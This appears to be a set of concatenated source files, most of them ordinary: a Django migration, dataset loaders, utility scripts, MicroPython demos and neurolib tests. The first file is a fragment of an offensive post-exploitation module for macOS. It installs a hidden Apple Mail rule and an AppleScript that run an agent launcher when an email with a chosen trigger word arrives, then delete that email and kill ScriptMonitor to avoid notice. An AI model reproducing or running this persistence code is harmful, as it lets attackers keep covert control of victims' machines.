'Comments': ['https://github.com/n00py/MailPersist']
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'RuleName' : {
'Description' : 'Name of the Rule.',
'Required' : True,
'Value' : 'Spam Filter'
},
'Trigger' : {
'Description' : 'The trigger word.',
'Required' : True,
'Value' : ''
}
}
#
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
ruleName = self.options['RuleName']['Value']
trigger = self.options['Trigger']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.replace('"', '\\"')
launcher = launcher.replace('"', '\\"')
launcher = "do shell script \"%s\"" % (launcher)
hex = '0123456789ABCDEF'
def UUID():
return ''.join([choice(hex) for x in range(8)]) + "-" + ''.join(
[choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(4)]) + "-" + ''.join(
[choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(12)])
CriterionUniqueId = UUID()
RuleId = UUID()
TimeStamp = str(int(time()))[0:9]
SyncedRules = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
RulesActiveState = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
AppleScript = ''.join(choice(ascii_uppercase) for i in range(12)) + ".scpt"
plist = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>''' + AppleScript + '''</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>''' + CriterionUniqueId + '''</string>
<key>Expression</key>
<string>''' + str(trigger) + '''</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>''' + RuleId + '''</string>
<key>RuleName</key>
<string>''' + str(ruleName) + '''</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>''' + TimeStamp + '''</integer>
<key>Version</key>
<integer>1</integer>
</dict>
</array>
</plist>'''
plist2 = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>''' + RuleId + '''</key>
<true/>
</dict>
</plist>
'''
script = """
import os
home = os.getenv("HOME")
AppleScript = '%s'
SyncedRules = '%s'
RulesActiveState = '%s'
plist = \"\"\"%s\"\"\"
plist2 = \"\"\"%s\"\"\"
payload = \'\'\'%s\'\'\'
payload = payload.replace('&\"', '& ')
payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep | awk \'{print $1}\'`"
payload += '\"'
script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
os.system("touch " + SyncedRules)
with open(SyncedRules, 'w+') as f:
f.write(plist)
f.close()
os.system("touch " + RulesActiveState)
with open(RulesActiveState, 'w+') as f:
f.write(plist2)
f.close()
with open(script, 'w+') as f:
f.write(payload)
f.close()
with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
v = a.read()
version = "V1"
if "10.7" in v:
version = "V2"
if "10.7" in v:
version = "V2"
if "10.8" in v:
version = "V2"
if "10.9" in v:
version = "V2"
if "10.10" in v:
version = "V2"
if "10.11" in v:
version = "V3"
if "10.12" in v:
version = "V4"
a.close()
if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"):
print "Trying to write to Mobile"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist")
else:
os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist")
print "Writing to main rules"
os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/" + version + "/MailData/RulesActiveState.plist")
os.system("rm " + SyncedRules)
os.system("rm " + RulesActiveState)
""" % (AppleScript, SyncedRules, RulesActiveState, plist, plist2, launcher)
return script |
orchestra/migrations/0055_auto_20160429_0823.py | code-review-doctor/orchestra | 444 | 12750642 | <reponame>code-review-doctor/orchestra
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-29 08:23
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0053_worker_slack_user_id'),
]
operations = [
migrations.RemoveField( # manually-reviewed
model_name='staffingrequest',
name='worker',
),
migrations.AddField(
model_name='staffingrequest',
name='communication_preference',
field=models.ForeignKey(
default=None, on_delete=django.db.models.deletion.CASCADE, to='orchestra.CommunicationPreference'),
),
migrations.AlterField(
model_name='communicationpreference',
name='communication_type',
field=models.IntegerField(
choices=[(0, 'task_status_change'), (1, 'new_task_available')]),
),
]
|
visual/dataset.py | eliasyin/MUStARD | 206 | 12750648 | import json
import os
from typing import Callable, Dict
import PIL.Image
import torch
import torch.utils.data
class SarcasmDataset(torch.utils.data.Dataset):
"""Dataset of Sarcasm videos."""
FRAMES_DIR_PATH = '../data/frames/utterances_final'
def __init__(self, transform: Callable = None, videos_data_path: str = '../data/sarcasm_data.json',
check_missing_videos: bool = True) -> None:
self.transform = transform
with open(videos_data_path) as file:
videos_data_dict = json.load(file)
for video_id in list(videos_data_dict.keys()): # Convert to list to possibly remove items.
video_folder_path = self._video_folder_path(video_id)
if not os.path.exists(video_folder_path):
if check_missing_videos:
raise FileNotFoundError(f"Directory {video_folder_path} not found, which was referenced in"
f" {videos_data_path}")
else:
del videos_data_dict[video_id]
self.video_ids = list(videos_data_dict.keys())
self.frame_count_by_video_id = {video_id: len(os.listdir(self._video_folder_path(video_id)))
for video_id in self.video_ids}
@staticmethod
def _video_folder_path(video_id: str) -> str:
return os.path.join(SarcasmDataset.FRAMES_DIR_PATH, video_id)
@staticmethod
def features_file_path(model_name: str, layer_name: str) -> str:
return f'../data/features/utterances_final/{model_name}_{layer_name}.hdf5'
def __getitem__(self, index) -> Dict[str, object]:
video_id = self.video_ids[index]
frames = None
video_folder_path = self._video_folder_path(video_id)
for i, frame_file_name in enumerate(os.listdir(video_folder_path)):
frame = PIL.Image.open(os.path.join(video_folder_path, frame_file_name))
if self.transform:
frame = self.transform(frame)
if frames is None:
# noinspection PyUnresolvedReferences
frames = torch.empty((self.frame_count_by_video_id[video_id], *frame.size()))
frames[i] = frame
return {'id': video_id, 'frames': frames}
def __len__(self) -> int:
return len(self.video_ids)
|
python/download_trained_model.py | linnostrom/DeepMVS | 301 | 12750656 | <filename>python/download_trained_model.py
import os
import sys
import subprocess
def download_trained_model(path = None):
if path is None:
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "model")
if not os.path.isdir(path):
os.mkdir(path)
print "Downloading trained model..."
subprocess.call(
"cd {:} ;".format(path) +
"wget -O DeepMVS_final.model https://www.dropbox.com/s/dcaip7n3z0yk7lx/DeepMVS_final.model?dl=1 ;",
shell = True
)
print "Successfully downloaded trained model."
if __name__ == "__main__":
download_trained_model()
|
anaconda_project/internal/rename.py | kathatherine/anaconda-project | 188 | 12750659 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
import errno
import os
import uuid
def rename_over_existing(src, dest):
try:
# On Windows, this will throw EEXIST, on Linux it won't.
# on Win32 / Python 2.7 it throws OSError instead of IOError
os.rename(src, dest)
except (OSError, IOError) as e:
if e.errno == errno.EEXIST:
# Clearly this song-and-dance is not in fact atomic,
# but if something goes wrong putting the new file in
# place at least the backup file might still be
# around.
backup = dest + ".bak-" + str(uuid.uuid4())
os.rename(dest, backup)
try:
os.rename(src, dest)
except Exception as e:
os.rename(backup, dest)
raise e
finally:
try:
os.remove(backup)
except Exception:
pass
else:
raise e
|
aliyun-python-sdk-live/aliyunsdklive/__init__.py | leafcoder/aliyun-openapi-python-sdk | 1,001 | 12750703 | __version__ = '3.9.10' |
lib/python/treadmill/syscall/__init__.py | vrautela/treadmill | 133 | 12750714 | """Linux direct system call interface.
"""
|
examples/dataset_concatenation.py | bomber8013/h5py | 1,657 | 12750724 | <filename>examples/dataset_concatenation.py
'''Concatenate multiple files into a single virtual dataset
'''
import h5py
import numpy as np
import sys
import os
def concatenate(file_names_to_concatenate):
entry_key = 'data' # where the data is inside of the source files.
sh = h5py.File(file_names_to_concatenate[0], 'r')[entry_key].shape # get the first ones shape.
layout = h5py.VirtualLayout(shape=(len(file_names_to_concatenate),) + sh,
dtype=np.float64)
with h5py.File("VDS.h5", 'w', libver='latest') as f:
for i, filename in enumerate(file_names_to_concatenate):
vsource = h5py.VirtualSource(filename, entry_key, shape=sh)
layout[i, :, :, :] = vsource
f.create_virtual_dataset(entry_key, layout, fillvalue=0)
def create_random_file(folder, index):
"""create one random file"""
name = os.path.join(folder, 'myfile_' + str(index))
with h5py.File(name=name, mode='w') as f:
d = f.create_dataset('data', (5, 10, 20), 'i4')
data = np.random.randint(low=0, high=100, size=(5*10*20))
data = data.reshape(5, 10, 20)
d[:] = data
return name
def main(argv):
files = argv[1:]
if len(files) == 0:
import tempfile
tmp_dir = tempfile.mkdtemp()
for i_file in range(5):
files.append(create_random_file(tmp_dir, index=i_file))
concatenate(files)
if __name__ == '__main__':
main(sys.argv)
|
segmentation/model/decoder/__init__.py | RajasekharChowdary9/panoptic-deeplab | 506 | 12750727 | <reponame>RajasekharChowdary9/panoptic-deeplab<gh_stars>100-1000
from .aspp import ASPP
from .deeplabv3 import DeepLabV3Decoder
from .deeplabv3plus import DeepLabV3PlusDecoder
from .panoptic_deeplab import PanopticDeepLabDecoder
|
Python-3/basic_examples/python_breakpoint_examples.py | ghiloufibelgacem/jornaldev | 1,139 | 12750756 | <reponame>ghiloufibelgacem/jornaldev
x = 10
y = 'Hi'
z = 'Hello'
print(y)
# breakpoint() is introduced in Python 3.7
breakpoint()
print(z)
# Execution Steps
# Default:
# $python3.7 python_breakpoint_examples.py
# Disable Breakpoint:
# $PYTHONBREAKPOINT=0 python3.7 python_breakpoint_examples.py
# Using Other Debugger (for example web-pdb):
# $PYTHONBREAKPOINT=web_pdb.set_trace python3.7 python_breakpoint_examples.py
|
src/breakpad/src/tools/gyp/test/hello/gyptest-regyp.py | ant0ine/phantomjs | 263 | 12750766 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that Makefiles get rebuilt when a source gyp file changes.
"""
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
test.run_gyp('hello.gyp')
test.build('hello.gyp', test.ALL)
test.run_built_executable('hello', stdout="Hello, world!\n")
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
test.write('hello.gyp', test.read('hello2.gyp'))
test.build('hello.gyp', test.ALL)
test.run_built_executable('hello', stdout="Hello, two!\n")
test.pass_test()
|
modules/nltk_contrib/hadoop/tf_idf/tfidf_map1.py | h4ck3rm1k3/NLP-project | 123 | 12750767 | from hadooplib.mapper import MapperBase
from hadooplib.inputformat import KeyValueInput
class TFIDFMapper1(MapperBase):
"""
keep only the word in the key field
remove filename from key and put it into value
(word filename, number) -> (word, filename number)
e.g. (dog 1.txt, 1) -> (dog, 1.txt 1)
"""
def __init__(self):
MapperBase.__init__(self)
self.set_inputformat(KeyValueInput)
def map(self, key, value):
"""
extract filename from key and put it into value
@param key: word and filename
@param value: term frequency
"""
word, filename = key.split()
self.outputcollector.collect(word, filename + "," + value)
if __name__ == "__main__":
TFIDFMapper1().call_map()
|
Korpora/korpus_aihub_kspon_speech.py | oikosohn/Korpora | 449 | 12750775 | <gh_stars>100-1000
import os
import re
from glob import glob
from dataclasses import dataclass
from typing import Dict
from .korpora import Korpus, KorpusData
from .utils import default_korpora_path
description = """ AI Hub 에서는 학습용 데이터를 제공합니다.
데이터를 활용하기 위해서는 아래 주소의 홈페이지에서 "AI데이터" 클릭 후,
이용하려는 데이터마다 직접 신청을 하셔야 합니다.
https://www.aihub.or.kr/
한국어 음성 데이터는 `AI 데이터` > `교육/문화/스포츠/` > `한국어음성` 혹은 아래의 주소에서
다운받으실 수 있으며, AI Hub에서는 1000시간 분량의 전체 음원데이터 뿐 아니라, 전사 스크립트(Text only)만을
따로 평문 텍스트(확장자: trn) 형식으로도 제공하고 있습니다.
https://www.aihub.or.kr/aidata/105 (2021.01.27 기준)
AI Hub 학습데이터는 신청 즉시 자동 승인됩니다.
Korpora>=0.3.0 에서는 로컬에 다운로드 된 말뭉치를 손쉽게 로딩하는 기능만 제공합니다.
이 스크립트는 전사스크립트 묶음 파일(KsponSpeech_scripts.zip)을 사용합니다. 이 파일을 압축 풀면
아래와 같은 파일들이 나옵니다.
train.trn
dev.trn
eval_clean.trn
eval_other.trn
위 파일들은 `~/Korpora/AIHub_KsponSpeech_scripts/` 혹은 `path/to/AIHub_KsponSpeech_scripts/` 에
저장되었다고 가정합니다.
(Korpora 개발진 <EMAIL>, <EMAIL>)"""
license = """ AI Hub 에서 제공하는 데이터의 소유권 및 전문은 다음의 주소에서 확인할 수 있습니다.
https://aihub.or.kr/form/iyongyaggwan
제16조 포털의 소유권
1. AI 허브가 제공하는 서비스, 그에 필요한 소프트웨어, 이미지, 마크, 로고, 디자인, 서비스명칭, 정보 및
상표 등과 관련된 지식재산권 및 기타 권리는 운영기관(및 AI허브 서비스 제공과 관련하여 운영기관과 계약을
체결한 기관)에 소유권이 있습니다.
2. 귀하는 AI 허브에서 명시적으로 승인한 경우를 제외하고는 전항의 소정의 각 재산에 대한 전부 또는 일부의 수정,
대여, 대출, 판매, 배포, 제작, 양도, 재라이센스, 담보권 설정 행위, 상업적 이용 행위를 할 수 없으며,
제3자로 하여금 이와 같은 행위를 하도록 허락할 수 없습니다"""
class AIHubKsponSpeechKorpus(Korpus):
def __init__(self, root_dir=None, force_download=False, prefix='', name='AIHub_KsponSpeech'):
super().__init__(description, license)
if root_dir is None:
root_dir = os.path.join(
default_korpora_path, 'AIHub_KsponSpeech_scripts', prefix)
elif isinstance(root_dir, str) and os.path.isdir(root_dir):
root_dir = os.path.join(
root_dir, 'AIHub_KsponSpeech_scripts', prefix)
paths = find_corpus_paths(root_dir)
self.train = KorpusData(
f'{name}.train', load_aihub_kspon_speech_scripts(paths))
@dataclass
class KsponSpeech:
sentence_id: str
sentence: str
pronounce_sentence: str
original_sentence: str
pronounces: Dict[str, str]
def __str__(self):
return self.__repr__()
def __repr__(self):
return f"""KsponSpeech(
id={self.sentence_id},
sentence={self.sentence},
pronounce_sentence={self.pronounce_sentence},
original_sentence={self.original_sentence},
pronounces={self.pronounces},
)"""
def find_corpus_paths(root_dir, suffix='.trn'):
def match(path):
return path[-4:] == suffix
# directory + wildcard
if isinstance(root_dir, str):
paths = sorted(glob(f'{root_dir}/*{suffix}') + glob(root_dir))
else:
paths = root_dir
paths = [path for path in paths if match(path)]
if not paths:
raise ValueError('Not found corpus files. Check `root_dir`')
return paths
def parse_kspon_speech(line):
sentence_id, original_sentence = line.split(' :: ')
# Cleaning - remove unknown/noise labels
sentence = re.sub(r'\s*[ublon]/\s*', r' ', original_sentence)
# Cleaning - remove meaningless character(maybe typo in original transcription)
sentence = re.sub(r'^/ ', r' ', sentence)
# Cleaning - remove repetition characters
sentence = re.sub(r'[\+\*]', r'', sentence)
pronounces = dict(re.findall(r'\(([^\)]+)\)/\(([^\)]+)\)', sentence))
pron_sentence = re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)', r'\2', sentence)
sentence = re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)', r'\1', sentence)
# Cleaning - remove filler characters
sentence = re.sub(r'(?<=[^\)])/\s*', r' ', sentence)
pron_sentence = re.sub(r'(?<=[^\)])/\s*', r' ', pron_sentence)
# Cleaning - remove space+
sentence = re.sub(r' +', r' ', sentence)
pron_sentence = re.sub(r' +', r' ', pron_sentence)
original_sentence = original_sentence.strip()
pron_sentence = pron_sentence.strip()
sentence = sentence.strip()
return sentence_id, sentence, pron_sentence, original_sentence, pronounces
def load_aihub_kspon_speech_scripts(paths):
examples = []
for path in paths:
with open(path, encoding='utf-8') as f:
examples += [KsponSpeech(*parse_kspon_speech(line))
for line in f.readlines()]
return examples
|
bruges/attribute/__init__.py | mycarta/bruges | 209 | 12750787 | <reponame>mycarta/bruges<filename>bruges/attribute/__init__.py
# -*- coding: utf-8 -*-
"""
:copyright: 2015 Agile Geoscience
:license: Apache 2.0
"""
from .energy import energy
from .similarity import similarity
from .dipsteer import dipsteer
from .spectrogram import spectrogram
from .spectraldecomp import spectraldecomp
|
inselect/gui/user_template_popup_button.py | NaturalHistoryMuseum/inselect | 128 | 12750788 | from PyQt5.QtWidgets import QAction, QFileDialog, QMenu, QPushButton
from inselect.lib.user_template import UserTemplate
from inselect.lib.utils import debug_print
from .user_template_choice import user_template_choice
from .utils import load_icon, reveal_path
class UserTemplatePopupButton(QPushButton):
"User template popup button"
FILE_FILTER = 'Inselect user templates (*{0})'.format(
UserTemplate.EXTENSION
)
def __init__(self, parent=None):
super(UserTemplatePopupButton, self).__init__(parent)
# Configure the UI
self._create_actions()
self.popup = QMenu()
self.inject_actions(self.popup)
self.setMenu(self.popup)
user_template_choice().template_changed.connect(self.changed)
# User template might already have been loaded so load the initial
if user_template_choice().current:
self.changed()
def __del__(self):
# Doing this prevents segfault on exit. Unsatisfactory.
del self.popup
def _create_actions(self):
self._choose_action = QAction(
"Choose...", self, triggered=self.choose,
icon=load_icon(':/icons/open.png')
)
self._refresh_action = QAction(
"Reload", self, triggered=self.refresh,
icon=load_icon(':/icons/refresh.png')
)
self._reveal_template_action = QAction(
"Reveal template", self, triggered=self.reveal
)
self._default_action = QAction(
"Default ({0})".format(user_template_choice().DEFAULT.name),
self, triggered=self.default, icon=load_icon(':/icons/close.png')
)
def inject_actions(self, menu):
"Adds user template actions to menu"
menu.addAction(self._choose_action)
menu.addAction(self._refresh_action)
menu.addAction(self._reveal_template_action)
menu.addSeparator()
menu.addAction(self._default_action)
def default(self, checked=False):
"Sets the default template"
user_template_choice().select_default()
def choose(self, checked=False):
"Shows a 'choose template' file dialog"
debug_print('UserTemplateWidget.choose')
path, selectedFilter = QFileDialog.getOpenFileName(
self, "Choose user template",
str(user_template_choice().last_directory()),
self.FILE_FILTER
)
if path:
# Save the user's choice
user_template_choice().load(path)
def refresh(self, checked=False):
debug_print('UserTemplateWidget.refresh')
user_template_choice().refresh()
def reveal(self, checked=False):
reveal_path(user_template_choice().current_path)
def changed(self):
"Slot for UserTemplateChoice.template_changed"
debug_print('UserTemplateWidget.changed')
choice = user_template_choice()
self.setText(choice.current.name)
self._default_action.setEnabled(not choice.current_is_default)
self._refresh_action.setEnabled(not choice.current_is_default)
self._reveal_template_action.setEnabled(not choice.current_is_default)
|
MicroPython_BUILD/components/internalfs_image/image/examples/thread_example.py | FlorianPoot/MicroPython_ESP32_psRAM_LoBo | 838 | 12750792 | <gh_stars>100-1000
import machine, _thread, time
import micropython, gc
import bme280
# Setup the LED pins
bled = machine.Pin(4, mode=machine.Pin.OUT)
#rled = machine.Pin(0, mode=machine.Pin.OUT)
#gled = machine.Pin(2, mode=machine.Pin.OUT)
bled.value(0)
#gled.value(0)
#rled.value(0)
# Setup I2C to be used with BME280 sensor
i2c=machine.I2C(scl=machine.Pin(26),sda=machine.Pin(25),speed=400000)
# Initialize BME280
bme=bme280.BME280(i2c=i2c)
# Define LED thread function
#---------------------------
def rgbled(n=200, led=bled):
notif_exit = 4718
notif_replay = 2
notif_count = 3
x = 0
_thread.allowsuspend(True)
while True:
led.value(1)
time.sleep_ms(n)
led.value(0)
x = x + 1
t = 10
while t > 0:
notif = _thread.getnotification()
if notif == notif_exit:
_thread.sendmsg(_thread.getReplID(), "[%s] Exiting" % (_thread.getSelfName()))
return
elif notif == notif_replay:
_thread.sendmsg(_thread.getReplID(), "[%s] I've been notified" % (_thread.getSelfName()))
elif notif == notif_count:
_thread.sendmsg(_thread.getReplID(), "[%s] Run counter = %u" % (_thread.getSelfName(), x))
elif notif == 777:
_thread.sendmsg(_thread.getReplID(), "[%s] Forced EXCEPTION" % (_thread.getSelfName()))
time.sleep_ms(1000)
zz = 234 / 0
elif notif != 0:
_thread.sendmsg(_thread.getReplID(), "[%s] Got unknown notification: %u" % (_thread.getSelfName(), notif))
typ, sender, msg = _thread.getmsg()
if msg:
_thread.sendmsg(_thread.getReplID(), "[%s] Message from '%s'\n'%s'" % (_thread.getSelfName(), _thread.getThreadName(sender), msg))
time.sleep_ms(100)
t = t - 1
gc.collect()
# For LED thread we don't need more than 3K stack
_ = _thread.stack_size(3*1024)
# Start LED thread
#rth=_thread.start_new_thread("R_Led", rgbled, (100, rled))
time.sleep_ms(500)
#gth=_thread.start_new_thread("G_Led", rgbled, (250, gled))
bth=_thread.start_new_thread("B_Led", rgbled, (100, bled))
# Function to generate BME280 values string
#---------------
def bmevalues():
t, p, h = bme.read_compensated_data()
p = p // 256
pi = p // 100
pd = p - pi * 100
hi = h // 1024
hd = h * 100 // 1024 - hi * 100
#return "[{}] T={0:1g}C ".format(time.strftime("%H:%M:%S",time.localtime()), round(t / 100,1)) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:01d}%".format(hi, hd)
return "[{}] T={}C ".format(time.strftime("%H:%M:%S",time.localtime()), t / 100) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:02d}%".format(hi, hd)
# Define BME280 thread function
#-----------------------
def bmerun(interval=60):
_thread.allowsuspend(True)
sendmsg = True
send_time = time.time() + interval
while True:
while time.time() < send_time:
notif = _thread.getnotification()
if notif == 10002:
_thread.sendmsg(_thread.getReplID(), bmevalues())
elif notif == 10004:
sendmsg = False
elif notif == 10006:
sendmsg = True
elif (notif <= 3600) and (notif >= 10):
interval = notif
send_time = time.time() + interval
_thread.sendmsg(_thread.getReplID(), "Interval set to {} seconds".format(interval))
time.sleep_ms(100)
send_time = send_time + interval
if sendmsg:
_thread.sendmsg(_thread.getReplID(), bmevalues())
# 3K is enough for BME280 thread
_ = _thread.stack_size(3*1024)
# start the BME280 thread
bmeth=_thread.start_new_thread("BME280", bmerun, (60,))
# === In the 3rd thread we will run Neopixels rainbow demo ===
np=machine.Neopixel(machine.Pin(22), 24)
# DEfine Neopixels thread function
#---------------
def thrainbow():
pos = 0
bri = 0.02
while True:
for i in range(0, 24):
dHue = 360.0/24*(pos+i);
hue = dHue % 360;
np.setHSB(i, hue, 1.0, bri, 1, False)
np.show()
notif = _thread.getnotification()
if (notif > 0) and (notif <= 100):
bri = notif / 100.0
elif notif == 1000:
_thread.sendmsg(_thread.getReplID(), "[%s] Run counter = %u" % (_thread.getSelfName(), pos))
pos = pos + 1
# Start the Neopixels thread
npth=_thread.start_new_thread("Neopixel", thrainbow, ())
utime.sleep(1)
machine.heap_info()
_thread.list()
# Set neopixel brightnes (%)
#_thread.notify(npth, 20)
# Get counter value from Neopixel thread
#_thread.notify(npth, 1000)
|
tests/test_metaheader.py | 1Q1-Open-Source/django-data-wizard | 279 | 12750812 | from .base import BaseImportTestCase
class MetaHeaderTestCase(BaseImportTestCase):
serializer_name = "tests.naturalkey_app.wizard.NoteMetaSerializer"
def test_manual(self):
run = self.upload_file("naturalkey_meta.xlsx")
# Inspect unmatched columns and select choices
self.check_columns(run, 4, 4)
self.update_columns(
run,
{
"Note": {
"Date:": "event[date]",
"Place:": "event[place][name]",
"Note": "note",
"Status": "status",
}
},
)
# Start data import process, wait for completion
self.start_import(run, [])
# Verify results
self.assert_log(
run,
[
"created",
"parse_columns",
"update_columns",
"do_import",
"import_complete",
],
)
self.assert_records(
run,
[
"Imported 'Minneapolis on 2019-01-01: Test Note 1' at row 4",
"Imported 'Minneapolis on 2019-01-01: Test Note 2' at row 5",
"Imported 'Minneapolis on 2019-01-01: Test Note 3' at row 6",
],
)
|
adanet/core/timer.py | eustomaqua/adanet | 3,323 | 12750814 | """A simple timer implementation.
Copyright 2018 The AdaNet Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
class _CountDownTimer(object):
"""A simple count down timer implementation."""
def __init__(self, duration_secs):
"""Initializes a `_CountDownTimer`.
Args:
duration_secs: Float seconds for countdown.
Returns:
A `_CountDownTimer` instance.
"""
self._start_time_secs = time.time()
self._duration_secs = duration_secs
def secs_remaining(self):
"""Returns the remaining countdown seconds."""
diff = self._duration_secs - (time.time() - self._start_time_secs)
return max(0., diff)
|
tests/test_stimulus.py | Ronjaa95/neurolib | 258 | 12750820 | """
Tests of noise input.
"""
import unittest
import numpy as np
from chspy import CubicHermiteSpline
from neurolib.models.aln import ALNModel
from neurolib.utils.stimulus import (
ConcatenatedStimulus,
ExponentialInput,
LinearRampInput,
OrnsteinUhlenbeckProcess,
RectifiedInput,
SinusoidalInput,
SquareInput,
StepInput,
SummedStimulus,
WienerProcess,
ZeroInput,
)
TESTING_TIME = 5.3
DURATION = 10
DT = 0.1
STIM_START = 2
STIM_END = 8
SHAPE = (2, int(DURATION / DT))
class TestCubicSplines(unittest.TestCase):
RESULT_SPLINES = np.array([-0.214062, -0.215043])
RESULT_ARRAY = np.array([0.193429, 0.073445])
def test_splines(self):
dW = WienerProcess(n=2, seed=42).as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, CubicHermiteSpline))
np.testing.assert_allclose(self.RESULT_SPLINES, dW.get_state(TESTING_TIME), atol=1e-05)
def test_arrays(self):
dW = WienerProcess(n=2, seed=42).as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, np.ndarray))
time_idx = np.around(TESTING_TIME / DT).astype(int)
np.testing.assert_allclose(self.RESULT_ARRAY, dW[:, time_idx], atol=1e-05)
def test_shift_start_time(self):
SHIFT = 5.0
dW = WienerProcess(n=2, seed=42).as_cubic_splines(duration=DURATION, dt=DT, shift_start_time=SHIFT)
self.assertTrue(isinstance(dW, CubicHermiteSpline))
self.assertEqual(dW[0].time, SHIFT + DT)
np.testing.assert_allclose(self.RESULT_SPLINES, dW.get_state(TESTING_TIME + SHIFT), atol=1e-05)
class TestToModel(unittest.TestCase):
def test_single_node(self):
model = ALNModel()
model.params["duration"] = 2 * 1000
stim = SinusoidalInput(amplitude=1.0, frequency=1.0)
model_stim = stim.to_model(model)
model.params["ext_exc_current"] = model_stim
model.run()
self.assertTrue(isinstance(model_stim, np.ndarray))
self.assertTupleEqual(model_stim.shape, (1, int(model.params["duration"] / model.params["dt"])))
def test_multi_node_multi_stim(self):
model = ALNModel(Cmat=np.random.rand(5, 5), Dmat=np.zeros((5, 5)))
model.params["duration"] = 2 * 1000
stim = SinusoidalInput(amplitude=1.0, frequency=1.0)
model_stim = stim.to_model(model)
model.params["ext_exc_current"] = model_stim
model.run()
self.assertTrue(isinstance(model_stim, np.ndarray))
self.assertTupleEqual(model_stim.shape, (5, int(model.params["duration"] / model.params["dt"])))
class TestZeroInput(unittest.TestCase):
def test_generate_input(self):
nn = ZeroInput(n=2, seed=42).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(nn, np.ndarray))
self.assertTupleEqual(nn.shape, SHAPE)
np.testing.assert_allclose(nn, np.zeros(SHAPE))
def test_get_params(self):
nn = ZeroInput(n=2, seed=42)
params = nn.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42})
def test_set_params(self):
nn = ZeroInput(n=2, seed=42)
UPDATE = {"seed": 635}
nn.update_params(UPDATE)
params = nn.get_params()
params.pop("type")
